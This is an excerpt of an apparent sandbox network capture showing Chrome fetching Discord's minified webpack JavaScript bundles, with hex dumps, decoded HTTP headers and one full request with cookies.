                                                                          2023-12-10 16:45:13 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 39 34 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 63 36 66 62 61 64 61 65 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 14942Connection: closeCF-Ray: 8336f4fc6fbadaed-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 36 34 38 30 22 5d 2c 7b 36 36 38 39 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 69 2e 70 2b 22 31 38 35 31 37 62 33 33 64 61 36 65 64 33 36 62 38 35 35 62 2e 73 76 67 22 7d 2c 31 32 34 30 33 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 69 2e 70 2b 22 32 33 30 34 37 32 35 64 62 33 63 39 36 37 30 35 65 39 30 31 2e 73 76 67 22 7d 2c 37 32 31 35 36 39 3a 66 75 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["86480"],{668973:function(e,t,i){"use strict";e.exports=i.p+"18517b33da6ed36b855b.svg"},124036:function(e,t,i){"use strict";e.exports=i.p+"2304725db3c96705e901.svg"},721569:fun
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 69 2e 70 2b 22 62 32 31 61 37 62 34 38 61 36 65 39 37 33 39 35 38 34 38 39 2e 73 76 67 22 7d 2c 36 34 34 32 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 69 2e 70 2b 22 35 66 66 38 66 66 61 61 33 38 33 31 34 37 38 64 32 61 32 38 2e 73 76 67 22 7d 2c 35 39 37 33 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 69 2e 70 2b 22 34 62 61 36 38 31 31 63 32 62 63 62 36 32 36 39 36 33 63 36 2e 73 76 67 22 7d 2c 33 38 30 34 39 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72
                                                                          Data Ascii: ction(e,t,i){"use strict";e.exports=i.p+"b21a7b48a6e973958489.svg"},644286:function(e,t,i){"use strict";e.exports=i.p+"5ff8ffaa3831478d2a28.svg"},597346:function(e,t,i){"use strict";e.exports=i.p+"4ba6811c2bcb626963c6.svg"},380499:function(e,t,i){"use str
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 41 63 63 65 73 73 69 62 69 6c 69 74 79 4c 61 62 65 6c 45 6c 65 6d 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6e 3d 69 28 22 34 37 36 37 36 35 22 29 2c 73 3d 69 28 22 37 38 32 33 34 30 22 29 3b 6c 65 74 20 61 3d 28 30 2c 6e 2e 75 69 64 29 28 29 2c 6c 3d 28 30 2c 6e 2e 75 69 64 29 28 29 2c 72 3d 28 30 2c 6e 2e 75 69 64 29 28 29 2c 75 3d 28 30 2c 6e 2e 75 69 64 29 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 5b 7b 69 64 3a 61 2c 74 65 78 74 3a 22 2c 22 7d 2c 7b 69 64 3a 6c 2c 74 65 78 74 3a 22 2c 22 7d 2c 7b 69 64 3a 72 2c 74 65 78 74 3a 73 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 52 45 41 43 54 49 4f 4e 53 7d 2c 7b 69 64 3a 75 2c 74 65 78 74 3a 73 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61
                                                                          Data Ascii: AccessibilityLabelElements:function(){return o}});var n=i("476765"),s=i("782340");let a=(0,n.uid)(),l=(0,n.uid)(),r=(0,n.uid)(),u=(0,n.uid)();function o(){[{id:a,text:","},{id:l,text:","},{id:r,text:s.default.Messages.REACTIONS},{id:u,text:s.default.Messa
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 70 72 65 6d 69 75 6d 4d 6f 64 61 6c 41 6e 61 6c 79 74 69 63 73 4c 6f 63 61 74 69 6f 6e 3a 6a 2c 73 68 6f 77 49 63 6f 6e 3a 55 3d 21 30 2c 64 69 73 61 62 6c 65 53 68 69 6e 65 3a 47 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 42 2c 67 69 66 74 4d 65 73 73 61 67 65 3a 44 2c 6f 76 65 72 72 69 64 65 44 69 73 61 62 6c 65 64 42 75 74 74 6f 6e 54 65 78 74 3a 6b 2c 73 68 69 6e 79 42 75 74 74 6f 6e 43 6c 61 73 73 4e 61 6d 65 3a 77 2c 2e 2e 2e 57 7d 3d 65 2c 48 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 6d 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 6d 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 55 73 65 72 28 29 29 2c 46 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 54 2e 64 65 66
                                                                          Data Ascii: premiumModalAnalyticsLocation:j,showIcon:U=!0,disableShine:G,applicationId:B,giftMessage:D,overrideDisabledButtonText:k,shinyButtonClassName:w,...W}=e,H=(0,l.useStateFromStores)([m.default],()=>m.default.getCurrentUser()),F=(0,l.useStateFromStores)([T.def
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 47 69 66 74 3a 61 2c 69 6e 69 74 69 61 6c 50 6c 61 6e 49 64 3a 6e 75 6c 6c 2c 73 75 62 73 63 72 69 70 74 69 6f 6e 54 69 65 72 3a 6c 2c 61 6e 61 6c 79 74 69 63 73 4c 6f 63 61 74 69 6f 6e 73 3a 66 2c 61 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 3a 7b 6f 62 6a 65 63 74 3a 5f 2e 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 73 2e 42 55 54 54 4f 4e 5f 43 54 41 2c 6f 62 6a 65 63 74 54 79 70 65 3a 54 2c 2e 2e 2e 70 7d 2c 74 72 69 61 6c 49 64 3a 75 2c 70 6f 73 74 53 75 63 63 65 73 73 47 75 69 6c 64 3a 6f 2c 6f 6e 43 6c 6f 73 65 3a 63 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 6d 2c 67 69 66 74 4d 65 73 73 61 67 65 3a 49 7d 29 7d 28 7b 69 73 43 6c 61 69 6d 65 64 3a 48 2e 69 73 43 6c 61 69 6d 65 64 28 29 2c 69 73 56 65 72 69 66 69 65 64 3a 48 2e 76 65 72 69 66 69
                                                                          Data Ascii: Gift:a,initialPlanId:null,subscriptionTier:l,analyticsLocations:f,analyticsObject:{object:_.AnalyticsObjects.BUTTON_CTA,objectType:T,...p},trialId:u,postSuccessGuild:o,onClose:c,applicationId:m,giftMessage:I})}({isClaimed:H.isClaimed(),isVerified:H.verifi
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 4a 3d 6e 75 6c 6c 21 3d 59 26 26 59 2e 73 74 61 74 75 73 21 3d 3d 5f 2e 53 75 62 73 63 72 69 70 74 69 6f 6e 53 74 61 74 75 73 54 79 70 65 73 2e 41 43 43 4f 55 4e 54 5f 48 4f 4c 44 26 26 21 28 30 2c 70 2e 69 73 4e 6f 6e 65 53 75 62 73 63 72 69 70 74 69 6f 6e 29 28 59 2e 70 6c 61 6e 49 64 29 26 26 21 71 2c 51 3d 4a 3f 6e 75 6c 6c 21 3d 6b 3f 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 63 74 61 53 75 62 73 63 72 69 70 74 69 6f 6e 53 6b 75 49 64 3a 74 2c 63 75 72 72 65 6e 74 50 72 65 6d 69 75 6d 54 79 70 65 3a 69 7d 3d 65 2c 6e 3d 6e 75 6c 6c 2c 73 3d 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 21 3d 74 26 26 74 21 3d 3d 4e 2e 50 72 65 6d 69 75 6d 53 75 62 73 63 72 69 70 74 69 6f 6e 53 4b 55 73 2e 4c 45 47 41 43 59 26 26 74 21 3d 3d 4e 2e 50 72 65 6d 69 75
                                                                          Data Ascii: J=null!=Y&&Y.status!==_.SubscriptionStatusTypes.ACCOUNT_HOLD&&!(0,p.isNoneSubscription)(Y.planId)&&!q,Q=J?null!=k?k:function(e){let{ctaSubscriptionSkuId:t,currentPremiumType:i}=e,n=null,s=null;if(null!=t&&t!==N.PremiumSubscriptionSKUs.LEGACY&&t!==N.Premiu
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 6e 3a 5b 55 26 26 28 30 2c 6e 2e 6a 73 78 29 28 53 2e 64 65 66 61 75 6c 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 62 2e 70 72 65 6d 69 75 6d 49 63 6f 6e 7d 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 61 28 62 2e 62 75 74 74 6f 6e 54 65 78 74 2c 4c 29 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 21 3d 3d 28 69 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 51 3f 76 6f 69 64 20 30 3a 51 2e 64 69 73 61 62 6c 65 64 42 75 74 74 6f 6e 54 65 78 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 4f 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 56 7d 29 5d 7d 29 7d 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 51 3f 76 6f 69 64 20 30 3a 51 2e 64 69 73 61 62 6c 65 64 42 75 74 74 6f 6e 54 6f 6f 6c 74 69 70 54 65 78 74 29 21
                                                                          Data Ascii: en:[U&&(0,n.jsx)(S.default,{className:b.premiumIcon}),(0,n.jsx)("span",{className:a(b.buttonText,L),children:null!==(i=null!==(t=null==Q?void 0:Q.disabledButtonText)&&void 0!==t?t:O)&&void 0!==i?i:V})]})}return(null==Q?void 0:Q.disabledButtonTooltipText)!
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 67 2c 6d 3f 35 3a 33 29 3b 74 3c 69 3b 74 2b 2b 29 76 5b 74 5d 3d 72 28 73 2f 50 2a 28 65 2b 2e 35 29 2a 74 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 2c 69 3d 30 3b 65 3c 67 3b 65 2b 2b 29 66 6f 72 28 6c 65 74 20 6e 3d 65 3f 30 3a 31 2c 73 3d 32 2a 76 5b 65 5d 3b 6e 2a 67 3c 54 2a 28 67 2d 65 29 3b 6e 2b 2b 2c 69 2b 2b 29 21 28 6e 3e 74 29 26 26 21 28 65 3e 74 29 26 26 28 75 2b 3d 79 5b 69 5d 2a 4c 5b 6e 5d 2a 73 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 2c 74 3d 30 3b 65 3c 33 3b 65 2b 2b 29 66 6f 72 28 6c 65 74 20 69 3d 65 3f 30 3a 31 2c 6e 3d 32 2a 76 5b 65 5d 3b 69 3c 33 2d 65 3b 69 2b 2b 2c 74 2b 2b 29 7b 6c 65 74 20 65 3d 4c 5b 69 5d 2a 6e 3b 6f 2b 3d 62 5b 74 5d 2a 65 2c 63 2b 3d 41 5b 74 5d 2a 65 7d 69 66 28 6d 29 66 6f 72 28 6c 65 74 20 65 3d 30 2c 74
                                                                          Data Ascii: g,m?5:3);t<i;t++)v[t]=r(s/P*(e+.5)*t);for(let e=0,i=0;e<g;e++)for(let n=e?0:1,s=2*v[e];n*g<T*(g-e);n++,i++)!(n>t)&&!(e>t)&&(u+=y[i]*L[n]*s);for(let e=0,t=0;e<3;e++)for(let i=e?0:1,n=2*v[e];i<3-e;i++,t++){let e=L[i]*n;o+=b[t]*e,c+=A[t]*e}if(m)for(let e=0,t
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 65 74 20 65 3b 6c 65 74 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 2c 69 6d 61 67 65 43 6c 61 73 73 4e 61 6d 65 3a 69 2c 72 65 61 64 79 53 74 61 74 65 3a 6e 2c 73 72 63 3a 61 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 6c 2c 70 6c 61 63 65 68 6f 6c 64 65 72 56 65 72 73 69 6f 6e 3a 75 2c 73 68 6f 77 54 68 75 6d 62 68 61 73 68 50 6c 61 63 65 68 6f 6c 64 65 72 3a 63 2c 61 6c 74 3a 70 2c 77 69 64 74 68 3a 53 2c 68 65 69 67 68 74 3a 45 2c 6d 61 78 57 69 64 74 68 3a 79 3d 53 2c 6d 61 78 48 65 69 67 68 74 3a 62 3d 45 2c 6d 69 6e 57 69 64 74 68 3a 41 2c 6d 69 6e 48 65 69 67 68 74 3a 52 2c 6d 65 64 69 61 4c 61 79 6f 75 74 54 79 70 65 3a 78 2c 6c 69 6d 69 74 52 65 73 70 6f 6e 73 69 76 65 57 69 64 74 68 3a 4d 3d 21 30 2c 61 63 63 65 73 73 6f 72 79 3a 50 2c 7a 6f 6f 6d 61 62 6c
                                                                          Data Ascii: et e;let{className:t,imageClassName:i,readyState:n,src:a,placeholder:l,placeholderVersion:u,showThumbhashPlaceholder:c,alt:p,width:S,height:E,maxWidth:y=S,maxHeight:b=E,minWidth:A,minHeight:R,mediaLayoutType:x,limitResponsiveWidth:M=!0,accessory:P,zoomabl


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          266192.168.2.550001162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/67615.9ab2f39e6303de9fa164.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=bwATnPuetc5_VMaNdwJ0_I5jgXIgH6LKeXH8pjFuGGk-1702226712432-0-604800000
                                                                          2023-12-10 16:45:13 UTC964INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 34 33 39 37 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 64 34 61 38 64 37 34 38 62 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 743975Connection: closeCF-Ray: 8336f4fd4a8d748b-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 37 36 31 35 22 5d 2c 7b 32 37 33 32 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 36 33 39 30 30 61 31 62 61 31 66 32 33 64 33 30 35 63 35 33 2e 70 6e 67 22 7d 2c 37 31 39 39 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 32 64 38 64 33 31 64 30 63 65 37 63 30 65 36 37 33 32 36 36 2e 70 6e 67 22 7d 2c 39 30 30 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["67615"],{273215:function(e,t,n){"use strict";e.exports=n.p+"63900a1ba1f23d305c53.png"},719933:function(e,t,n){"use strict";e.exports=n.p+"2d8d31d0ce7c0e673266.png"},90026:function(e,t
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 32 78 6d 6c 22 2c 22 70 73 63 31 22 2c 22 70 73 63 32 22 2c 22 70 73 64 31 22 2c 22 70 73 64 6d 31 22 2c 22 70 73 74 22 2c 22 70 79 22 2c 22 70 79 63 22 2c 22 70 79 6f 22 2c 22 70 79 77 22 2c 22 70 79 7a 22 2c 22 70 79 7a 77 22 2c 22 72 61 72 22 2c 22 72 65 67 22 2c 22 72 70 6d 22 2c 22 73 63 66 22 2c 22 73 63 72 22 2c 22 73 63 74 22 2c 22 73 68 62 22 2c 22 73 68 73 22 2c 22 73 6c 64 6d 22 2c 22 73 79 73 22 2c 22 74 68 65 6d 65 22 2c 22 74 6d 70 22 2c 22 75 72 6c 22 2c 22 76 62 22 2c 22 76 62 65 22 2c 22 76 62 70 22 2c 22 76 62 73 22 2c 22 76 68 64 22 2c 22 76 68 64 78 22 2c 22 76 73 6d 61 63 72 6f 73 22 2c 22 76 73 77 22 2c 22 76 78 64 22 2c 22 77 65 62 70 6e 70 22 2c 22 77 73 22 2c 22 77 73 63 22 2c 22 77 73 66 22 2c 22 77 73 68 22 2c 22 78 62 61 70 22
                                                                          Data Ascii: 2xml","psc1","psc2","psd1","psdm1","pst","py","pyc","pyo","pyw","pyz","pyzw","rar","reg","rpm","scf","scr","sct","shb","shs","sldm","sys","theme","tmp","url","vb","vbe","vbp","vbs","vhd","vhdx","vsmacros","vsw","vxd","webpnp","ws","wsc","wsf","wsh","xbap"
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 7d 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 41 4c 4c 5f 45 4e 51 55 45 55 45 5f 52 49 4e 47 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 72 65 63 69 70 69 65 6e 74 73 3a 74 7d 29 7d 2c 73 74 6f 70 52 69 6e 67 69 6e 67 3a 28 65 2c 74 29 3d 3e 69 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 5f 2e 45 6e 64 70 6f 69 6e 74 73 2e 43 41 4c 4c 5f 53 54 4f 50 5f 52 49 4e 47 49 4e 47 28 65 29 2c 62 6f 64 79 3a 7b 72 65 63 69 70 69 65 6e 74 73 3a 74 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 7d 7d 2c 34 35 30 39 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29
                                                                          Data Ascii: ,oldFormErrors:!0});return}a.default.dispatch({type:"CALL_ENQUEUE_RING",channelId:e,recipients:t})},stopRinging:(e,t)=>i.default.post({url:_.Endpoints.CALL_STOP_RINGING(e),body:{recipients:t},oldFormErrors:!0})}},450911:function(e,t,n){"use strict";n.r(t)
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 7d 29 2c 74 3d 28 30 2c 64 2e 63 72 65 61 74 65 43 68 61 6e 6e 65 6c 52 65 63 6f 72 64 46 72 6f 6d 53 65 72 76 65 72 29 28 65 2e 62 6f 64 79 29 3b 72 65 74 75 72 6e 20 45 2e 64 65 66 61 75 6c 74 2e 63 61 6c 6c 28 74 2e 69 64 2c 21 31 2c 21 31 2c 6e 75 6c 6c 29 2c 65 2e 62 6f 64 79 2e 69 64 7d 63 61 74 63 68 28 74 29 7b 76 61 72 20 65 3b 74 68 72 6f 77 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 2e 62 6f 64 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 64 65 29 3d 3d 3d 66 2e 41 62 6f 72 74 43 6f 64 65 73 2e 51 55 41 52 41 4e 54 49 4e 45 44 26 26 28 30 2c 75 2e 64 65 66 61 75 6c 74 29 28 29 2c 74 7d 7d 2c 5f 6f 70 65 6e 43 61 63 68 65 64 44 4d 43 68 61 6e 6e 65 6c 28 65 2c 74 29 7b 6c 65
                                                                          Data Ascii: }),t=(0,d.createChannelRecordFromServer)(e.body);return E.default.call(t.id,!1,!1,null),e.body.id}catch(t){var e;throw(null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.code)===f.AbortCodes.QUARANTINED&&(0,u.default)(),t}},_openCachedDMChannel(e,t){le
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 2e 69 64 29 2c 7b 6e 61 76 69 67 61 74 69 6f 6e 52 65 70 6c 61 63 65 3a 21 30 7d 29 3a 68 2e 64 65 66 61 75 6c 74 2e 73 65 6c 65 63 74 50 72 69 76 61 74 65 43 68 61 6e 6e 65 6c 28 74 2e 69 64 29 2c 74 7d 2c 63 6c 6f 73 65 50 72 69 76 61 74 65 43 68 61 6e 6e 65 6c 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3b 72 65 74 75 72 6e 20 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 48 41 4e 4e 45 4c 5f 44
                                                                          Data Ascii: t.id),{navigationReplace:!0}):h.default.selectPrivateChannel(t.id),t},closePrivateChannel(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.length>2&&void 0!==arguments[2]&&arguments[2];return l.default.dispatch({type:"CHANNEL_D
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6e 2c 69 29 2e 74 68 65 6e 28 65 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 74 2e 73 6c 69 63 65 28 31 29 2e 6d 61 70 28 74 3d 3e 74 68 69 73 2e 61 64 64 52 65 63 69 70 69 65 6e 74 28 65 2c 74 2c 6e 29 29 29 2e 74 68 65 6e 28 28 29 3d 3e 65 29 29 7d 2c 72 65 6d 6f 76 65 52 65 63 69 70 69 65 6e 74 3a 28 65 2c 74 29 3d 3e 69 2e 64 65 66 61 75 6c 74 2e 64 65 6c 65 74 65 28 7b 75 72 6c 3a 66 2e 45 6e 64 70 6f 69 6e 74 73 2e 43 48 41 4e 4e 45 4c 5f 52 45 43 49 50 49 45 4e 54 28 65 2c 74 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 73 65 74 44 4d 4f 77 6e 65 72 3a 28 65 2c 74 29 3d 3e 69 2e 64 65 66 61 75 6c 74 2e 70 61 74 63 68 28 7b 75 72 6c 3a 66 2e 45 6e 64 70 6f 69 6e 74 73 2e 43 48 41 4e 4e 45 4c 28 65 29 2c 62 6f 64 79 3a 7b 6f 77 6e 65
                                                                          Data Ascii: n,i).then(e=>Promise.all(t.slice(1).map(t=>this.addRecipient(e,t,n))).then(()=>e))},removeRecipient:(e,t)=>i.default.delete({url:f.Endpoints.CHANNEL_RECIPIENT(e,t),oldFormErrors:!0}),setDMOwner:(e,t)=>i.default.patch({url:f.Endpoints.CHANNEL(e),body:{owne
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 21 3d 6e 26 26 28 6c 2e 70 61 72 65 6e 74 5f 69 64 3d 6e 29 2c 6e 75 6c 6c 21 3d 61 26 26 28 6c 2e 74 6f 70 69 63 3d 61 29 3b 6c 65 74 20 72 3d 61 77 61 69 74 20 69 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 66 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 43 48 41 4e 4e 45 4c 53 28 65 29 2c 62 6f 64 79 3a 6c 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 73 2e 64 65 66 61 75 6c 74 2e 63 68 65 63 6b 47 75 69 6c 64 54 65 6d 70 6c 61 74 65 44 69 72 74 79 28 65 29 2c 72 7d 7d 7d 2c 32 35 35 33 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                          Data Ascii: !=n&&(l.parent_id=n),null!=a&&(l.topic=a);let r=await i.default.post({url:f.Endpoints.GUILD_CHANNELS(e),body:l,oldFormErrors:!0});return s.default.checkGuildTemplateDirty(e),r}}},255397:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return
